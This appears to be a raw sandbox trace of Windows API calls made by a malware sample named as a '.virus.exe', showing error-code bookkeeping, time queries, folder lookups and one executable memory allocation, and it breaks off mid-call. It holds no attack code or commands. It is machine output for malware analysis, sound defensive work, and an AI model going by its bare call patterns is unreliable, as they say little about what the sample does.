[0076.649] GetLastError () returned 0x0 [0076.650] SetLastError (dwErrCode=0x0) [0076.650] GetLastError () returned 0x0 [0076.650] SetLastError (dwErrCode=0x0) [0076.650] GetLastError () returned 0x0 [0076.650] SetLastError (dwErrCode=0x0) [0076.650] GetTimeZoneInformation (in: lpTimeZoneInformation=0x28fdbc | out: lpTimeZoneInformation=0x28fdbc) returned 0x2 [0076.686] GetLastError () returned 0x0 [0076.686] SetLastError (dwErrCode=0x0) [0076.808] GetLastError () returned 0x0 [0076.808] SetLastError (dwErrCode=0x0) [0076.808] GetCurrentThreadId () returned 0xf38 [0076.808] GetLastError () returned 0x0 [0076.808] SetLastError (dwErrCode=0x0) [0076.808] GetLastError () returned 0x0 [0076.808] SetLastError (dwErrCode=0x0) [0076.874] GetLastError () returned 0x0 [0076.874] SetLastError (dwErrCode=0x0) [0076.874] GetCurrentThreadId () returned 0xf38 [0076.874] GetLastError () returned 0x0 [0076.874] SetLastError (dwErrCode=0x0) [0076.874] GetLastError () returned 0x0 [0076.874] SetLastError (dwErrCode=0x0) [0076.874] GetLastError () returned 0x0 [0076.874] SetLastError (dwErrCode=0x0) [0076.875] GetLastError () returned 0x0 [0076.875] SetLastError (dwErrCode=0x0) [0076.942] GetLocalTime (in: lpSystemTime=0x28fe6c | out: lpSystemTime=0x28fe6c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x6, wMilliseconds=0xd9)) [0076.943] GetLastError () returned 0x0 [0076.943] SetLastError (dwErrCode=0x0) [0076.943] GetLastError () returned 0x0 [0076.943] SetLastError (dwErrCode=0x0) [0076.944] GetCurrentThreadId () returned 0xf38 [0076.944] GetLastError () returned 0x0 [0076.944] SetLastError (dwErrCode=0x0) [0076.944] GetLastError () returned 0x0 [0076.945] SetLastError (dwErrCode=0x0) [0077.012] GetLastError () returned 0x0 [0077.012] SetLastError (dwErrCode=0x0) [0077.013] GetLastError () returned 0x0 [0077.013] SetLastError (dwErrCode=0x0) [0077.013] GetCurrentThreadId () returned 0xf38 [0077.013] GetLastError () returned 0x0 [0077.013] SetLastError (dwErrCode=0x0) [0077.013] GetLastError () returned 0x0 [0077.013] SetLastError (dwErrCode=0x0) [0077.013] GetLastError () returned 0x0 [0077.014] SetLastError (dwErrCode=0x0) [0077.014] GetLastError () returned 0x0 [0077.014] SetLastError (dwErrCode=0x0) [0077.063] GetTimeZoneInformation (in: lpTimeZoneInformation=0x28fdbc | out: lpTimeZoneInformation=0x28fdbc) returned 0x2 [0077.063] GetLastError () returned 0x0 [0077.063] SetLastError (dwErrCode=0x0) [0077.063] GetLastError () returned 0x0 [0077.064] SetLastError (dwErrCode=0x0) [0077.064] GetCurrentThreadId () returned 0xf38 [0077.064] GetLastError () returned 0x0 [0077.064] SetLastError (dwErrCode=0x0) [0077.114] GetLastError () returned 0x0 [0077.114] SetLastError (dwErrCode=0x0) [0077.114] GetLastError () returned 0x0 [0077.114] SetLastError (dwErrCode=0x0) [0077.114] GetCurrentThreadId () returned 0xf38 [0077.114] GetLastError () returned 0x0 [0077.114] SetLastError (dwErrCode=0x0) [0077.164] GetLastError () returned 0x0 [0077.164] SetLastError (dwErrCode=0x0) [0077.164] GetLastError () returned 0x0 [0077.164] SetLastError (dwErrCode=0x0) [0077.164] GetLastError () returned 0x0 [0077.164] SetLastError (dwErrCode=0x0) [0077.216] GetLastError () returned 0x0 [0077.216] SetLastError (dwErrCode=0x0) [0077.264] GetLastError () returned 0x0 [0077.265] SetLastError (dwErrCode=0x0) [0077.265] GetLastError () returned 0x0 [0077.265] SetLastError (dwErrCode=0x0) [0077.265] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0077.265] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0077.265] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0077.266] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0077.266] GetLastError () returned 0x0 [0077.266] SetLastError (dwErrCode=0x0) [0077.266] GetLastError () returned 0x0 [0077.266] SetLastError (dwErrCode=0x0) [0077.266] GetLastError () returned 0x0 [0077.266] SetLastError (dwErrCode=0x0) [0077.314] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0xe3bb3c, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0077.315] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\D", cchLength=0x14 | out: lpsz="c:\\users\\keecfmwgj\\d") returned 0x14 [0077.315] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", nBufferLength=0x104, lpBuffer=0x28f9cc, lpFilePart=0x28f9c8 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", lpFilePart=0x28f9c8*="2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 0x45 [0077.315] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), lpFindFileData=0x28fc28 | out: lpFindFileData=0x28fc28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc475a400, ftCreationTime.dwHighDateTime=0x1da9884, ftLastAccessTime.dwLowDateTime=0xc50e3a80, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0x8764de00, ftLastWriteTime.dwHighDateTime=0x1da9893, nFileSizeHigh=0x0, nFileSizeLow=0x144254c, dwReserved0=0x557580, dwReserved1=0x0, cFileName="2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", cAlternateFileName="2A29D1~1.EXE")) returned 0xe3eac8 [0077.315] FileTimeToLocalFileTime (in: lpFileTime=0x28fc3c, lpLocalFileTime=0x28fbc0 | out: lpLocalFileTime=0x28fbc0) returned 1 [0077.315] FileTimeToDosDateTime (in: lpFileTime=0x28fbc0, lpFatDate=0x28fc0a, lpFatTime=0x28fc08 | out: lpFatDate=0x28fc0a, lpFatTime=0x28fc08) returned 1 [0077.316] SysReAllocStringLen (in: pbstr=0x28fc00*=0x0, psz="C:\\Users\\kEecfMwgj\\Desktop\\", len=0x1b | out: pbstr=0x28fc00*="C:\\Users\\kEecfMwgj\\Desktop\\") returned 1 [0077.316] SysReAllocStringLen (in: pbstr=0x28fbf8*=0x0, psz="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", len=0x45 | out: pbstr=0x28fbf8*="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 1 [0077.316] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", cchLength=0x45 | out: lpsz="c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 0x45 [0077.316] SysReAllocStringLen (in: pbstr=0x28ff10*="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", psz="c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", len=0x45 | out: pbstr=0x28ff10*="c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 1 [0077.316] GetLastError () returned 0x0 [0077.316] SetLastError (dwErrCode=0x0) [0077.316] GetLastError () returned 0x0 [0077.317] SetLastError (dwErrCode=0x0) [0077.317] GetLastError () returned 0x0 [0077.317] SetLastError (dwErrCode=0x0) [0077.317] SysReAllocStringLen (in: pbstr=0x557578*=0x0, psz="c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", len=0x45 | out: pbstr=0x557578*="c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 1 [0077.317] GetLastError () returned 0x0 [0077.317] SetLastError (dwErrCode=0x0) [0077.370] GetLastError () returned 0x0 [0077.371] SetLastError (dwErrCode=0x0) [0077.371] GetLastError () returned 0x0 [0077.371] SetLastError (dwErrCode=0x0) [0077.371] SysReAllocStringLen (in: pbstr=0x332004c*=0x0, psz="c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", len=0x45 | out: pbstr=0x332004c*="c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 1 [0077.371] SysReAllocStringLen (in: pbstr=0x3320060*=0x0, psz="c:\\users\\keecfmwgj\\desktop\\", len=0x1b | out: pbstr=0x3320060*="c:\\users\\keecfmwgj\\desktop\\") returned 1 [0077.371] SysReAllocStringLen (in: pbstr=0x28fe60*=0x0, psz="c:\\users\\keecfmwgj\\desktop\\", len=0x1b | out: pbstr=0x28fe60*="c:\\users\\keecfmwgj\\desktop\\") returned 1 [0077.420] CharLowerBuffW (in: lpsz="c:\\users\\keecfmwgj\\desktop\\", cchLength=0x1b | out: lpsz="c:\\users\\keecfmwgj\\desktop\\") returned 0x1b [0077.420] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\users\\keecfmwgj\\desktop\\", len=0x1b | out: pbstr=0x332009c*="c:\\users\\keecfmwgj\\desktop\\") returned 1 [0077.420] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.420] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="users", len=0x5 | out: pbstr=0x33200c0*="users") returned 1 [0077.421] SysReAllocStringLen (in: pbstr=0x33200e0*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33200e0*="keecfmwgj") returned 1 [0077.421] SysReAllocStringLen (in: pbstr=0x33200ec*=0x0, psz="desktop", len=0x7 | out: pbstr=0x33200ec*="desktop") returned 1 [0077.421] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.421] SysReAllocStringLen (in: pbstr=0x28fe64*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe64*="c:\\") returned 1 [0077.421] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0077.421] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xe3c308 [0077.422] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0077.422] GetLastError () returned 0x12 [0077.422] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.423] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0077.423] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe64*="c:\\Users\\") returned 1 [0077.423] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0077.423] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0xe3c308 [0077.423] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0077.424] GetLastError () returned 0x12 [0077.424] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.424] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0077.424] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\") returned 1 [0077.424] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="desktop", len=0x7 | out: pbstr=0x28fae8*="desktop") returned 1 [0077.424] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\desktop" (normalized: "c:\\users\\keecfmwgj\\desktop"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe2e52500, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xe2e52500, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0xe3c308 [0077.424] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe2e52500, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xe2e52500, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0 [0077.425] GetLastError () returned 0x12 [0077.425] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.425] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\Desktop", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\Desktop") returned 1 [0077.425] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\Desktop", psz="c:\\Users\\kEecfMwgj\\Desktop\\", len=0x1b | out: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\Desktop\\") returned 1 [0077.426] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\Desktop\\", len=0x1b | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\Desktop\\") returned 1 [0077.426] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\Desktop\\", psz="c:\\Users\\kEecfMwgj\\Desktop", len=0x1a | out: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\Desktop") returned 1 [0077.426] SysReAllocStringLen (in: pbstr=0x28fe68*=0x0, psz="c:\\Users\\kEecfMwgj\\Desktop", len=0x1a | out: pbstr=0x28fe68*="c:\\Users\\kEecfMwgj\\Desktop") returned 1 [0077.426] SysReAllocStringLen (in: pbstr=0x3320060*="c:\\users\\keecfmwgj\\desktop\\", psz="c:\\Users\\kEecfMwgj\\Desktop\\", len=0x1b | out: pbstr=0x3320060*="c:\\Users\\kEecfMwgj\\Desktop\\") returned 1 [0077.426] VirtualAlloc (lpAddress=0x3324000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0x3324000 [0077.429] GetSystemDirectoryW (in: lpBuffer=0x3323b80, uSize=0xfffe | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.429] CharLowerBuffW (in: lpsz="C:\\Windows\\system32", cchLength=0x13 | out: lpsz="c:\\windows\\system32") returned 0x13 [0077.429] SysReAllocStringLen (in: pbstr=0x3333b88*=0x0, psz="c:\\windows\\system32", len=0x13 | out: pbstr=0x3333b88*="c:\\windows\\system32") returned 1 [0077.430] SysReAllocStringLen (in: pbstr=0x3333b8c*=0x0, psz="c:", len=0x2 | out: pbstr=0x3333b8c*="c:") returned 1 [0077.430] SysReAllocStringLen (in: pbstr=0x3333bac*=0x0, psz="windows", len=0x7 | out: pbstr=0x3333bac*="windows") returned 1 [0077.430] SysReAllocStringLen (in: pbstr=0x3333bcc*=0x0, psz="system32", len=0x8 | out: pbstr=0x3333bcc*="system32") returned 1 [0077.431] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.431] SysReAllocStringLen (in: pbstr=0x28fe58*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe58*="c:\\") returned 1 [0077.431] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0077.431] FindFirstFileW (in: lpFileName="c:\\windows" (normalized: "c:\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xcd2c7d80, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xcd2c7d80, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0xe3c308 [0077.431] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xcd2c7d80, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xcd2c7d80, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0077.431] GetLastError () returned 0x12 [0077.431] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.432] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x28fadc*="c:\\Windows") returned 1 [0077.432] SysReAllocStringLen (in: pbstr=0x28fe58*="c:\\Windows", psz="c:\\Windows\\", len=0xb | out: pbstr=0x28fe58*="c:\\Windows\\") returned 1 [0077.432] SysReAllocStringLen (in: pbstr=0x28fae8*="windows", psz="system32", len=0x8 | out: pbstr=0x28fae8*="system32") returned 1 [0077.432] FindFirstFileW (in: lpFileName="c:\\Windows\\system32" (normalized: "c:\\windows\\system32"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x30822e60, ftLastAccessTime.dwHighDateTime=0x1d99d0a, ftLastWriteTime.dwLowDateTime=0x30822e60, ftLastWriteTime.dwHighDateTime=0x1d99d0a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0xe3c308 [0077.432] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x30822e60, ftLastAccessTime.dwHighDateTime=0x1d99d0a, ftLastWriteTime.dwLowDateTime=0x30822e60, ftLastWriteTime.dwHighDateTime=0x1d99d0a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0 [0077.432] GetLastError () returned 0x12 [0077.432] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.433] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Windows\\", psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x28fadc*="c:\\Windows\\System32") returned 1 [0077.433] SysReAllocStringLen (in: pbstr=0x28fe58*="c:\\Windows\\System32", psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0x28fe58*="c:\\Windows\\System32\\") returned 1 [0077.433] VirtualFree (lpAddress=0x3334000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0077.434] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0x28fad8*="c:\\Windows\\System32\\") returned 1 [0077.435] SysReAllocStringLen (in: pbstr=0x28fe58*="c:\\Windows\\System32\\", psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x28fe58*="c:\\Windows\\System32") returned 1 [0077.435] SysReAllocStringLen (in: pbstr=0x28fe5c*=0x0, psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x28fe5c*="c:\\Windows\\System32") returned 1 [0077.435] SysReAllocStringLen (in: pbstr=0x3320058*=0x0, psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0x3320058*="c:\\Windows\\System32\\") returned 1 [0077.435] SysReAllocStringLen (in: pbstr=0x28fe50*=0x0, psz="c:", len=0x2 | out: pbstr=0x28fe50*="c:") returned 1 [0077.436] SysReAllocStringLen (in: pbstr=0x332005c*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x332005c*="c:\\") returned 1 [0077.436] GetTempPathW (in: nBufferLength=0xfffe, lpBuffer=0x3323b80 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0077.436] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchLength=0x25 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 0x25 [0077.436] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\", len=0x25 | out: pbstr=0x332009c*="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 1 [0077.436] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.436] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="users", len=0x5 | out: pbstr=0x33200c0*="users") returned 1 [0077.437] SysReAllocStringLen (in: pbstr=0x33200e0*=0x0, psz="keecfm~1", len=0x8 | out: pbstr=0x33200e0*="keecfm~1") returned 1 [0077.437] SysReAllocStringLen (in: pbstr=0x33200ec*=0x0, psz="appdata", len=0x7 | out: pbstr=0x33200ec*="appdata") returned 1 [0077.437] SysReAllocStringLen (in: pbstr=0x33200f8*=0x0, psz="local", len=0x5 | out: pbstr=0x33200f8*="local") returned 1 [0077.437] SysReAllocStringLen (in: pbstr=0x3320104*=0x0, psz="temp", len=0x4 | out: pbstr=0x3320104*="temp") returned 1 [0077.438] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.438] SysReAllocStringLen (in: pbstr=0x28fe44*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe44*="c:\\") returned 1 [0077.438] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0077.438] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xe3c308 [0077.439] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0077.439] GetLastError () returned 0x12 [0077.439] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.439] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0077.439] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe44*="c:\\Users\\") returned 1 [0077.439] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfm~1", len=0x8 | out: pbstr=0x28fae8*="keecfm~1") returned 1 [0077.439] FindFirstFileW (in: lpFileName="c:\\Users\\keecfm~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0xe3c308 [0077.440] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0077.440] GetLastError () returned 0x12 [0077.440] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.440] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0077.440] SysReAllocStringLen 